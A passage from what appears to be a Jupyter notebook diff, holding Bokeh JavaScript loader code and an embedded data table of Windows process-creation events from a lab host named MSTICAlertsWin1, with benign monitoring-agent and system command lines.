\"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"5705a6d0-1bca-4c2f-ad12-bc65f08f3497\" data-root-id=\"1024\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"10ccfc77-fc95-462a-a396-e33a049da5d1\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"auto_edit\":true,\"columns\":[{\"id\":\"1003\"},{\"id\":\"1004\"},{\"id\":\"1005\"},{\"id\":\"1021\"},{\"id\":\"1006\"},{\"id\":\"1007\"},{\"id\":\"1008\"},{\"id\":\"1009\"},{\"id\":\"1010\"},{\"id\":\"1011\"},{\"id\":\"1012\"},{\"id\":\"1013\"},{\"id\":\"1014\"},{\"id\":\"1015\"},{\"id\":\"1016\"},{\"id\":\"1017\"},{\"id\":\"1018\"},{\"id\":\"1019\"}],\"editable\":true,\"height\":550,\"source\":{\"id\":\"1002\"},\"view\":{\"id\":\"1023\"},\"width_policy\":\"max\"},\"id\":\"1024\",\"type\":\"DataTable\"},{\"attributes\":{},\"id\":\"1032\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1037\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1042\"},\"field\":\"SubjectDomainName\",\"formatter\":{\"id\":\"1041\"},\"title\":\"SubjectDomainName\",\"width\":9},\"id\":\"1009\",\"type\":\"TableColumn\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1020\",\"type\":\"DateFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1056\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1055\"},\"title\":\"ParentProcessName\",\"width\":73},\"id\":\"1016\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1043\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1056\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1028\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1042\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1058\",\"type\":\"StringEditor\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1023\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1053\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1050\"},\"field\":\"TokenElevationType\",\"formatter\":{\"id\":\"1049\"},\"title\":\"TokenElevationType\",\"width\":6},\"id\":\"1013\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1058\"},\"field\":\"TargetLogonId\",\"formatter\":{\"id\":\"1057\"},\"title\":\"TargetLogonId\",\"width\":3},\"id\":\"1017\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1039\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1040\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1033\"},\"field\":\"EventID\",\"formatter\":{\"id\":\"1032\"},\"title\":\"EventID\",\"width\":8},\"id\":\"1005\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1031\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1052\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1062\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1040\"},\"field\":\"SubjectUserName\",\"formatter\":{\"id\":\"1039\"},\"title\":\"SubjectUserName\",\"width\":16},\"id\":\"1008\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1047\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1031\"},\"field\":\"Account\",\"formatter\":{\"id\":\"1030\"},\"title\":\"Account\",\"width\":26},\"id\":\"1004\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1036\"},\"field\":\"Computer\",\"formatter\":{\"id\":\"1035\"},\"title\":\"Computer\",\"width\":15},\"id\":\"1006\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1041\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1046\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1054\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1044\"},\"field\":\"SubjectLogonId\",\"formatter\":{\"id\":\"1043\"},\"title\":\"SubjectLogonId\",\"width\":5},\"id\":\"1010\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1027\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1035\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1052\"},\"field\":\"ProcessId\",\"formatter\":{\"id\":\"1051\"},\"title\":\"ProcessId\",\"width\":5},\"id\":\"1014\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1051\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1059\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1060\"},\"field\":\"SourceComputerId\",\"formatter\":{\"id\":\"1059\"},\"title\":\"SourceComputerId\",\"width\":36},\"id\":\"1018\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1049\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1030\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1029\"},\"field\":\"TenantId\",\"formatter\":{\"id\":\"1028\"},\"title\":\"TenantId\",\"width\":36},\"id\":\"1003\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1029\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1034\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1020\"},\"title\":\"TimeGenerated\",\"width\":50},\"id\":\"1021\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1050\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1060\",\"type\":\"StringEditor\"},{\"attributes\":{\"data\":{\"Account\":[\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 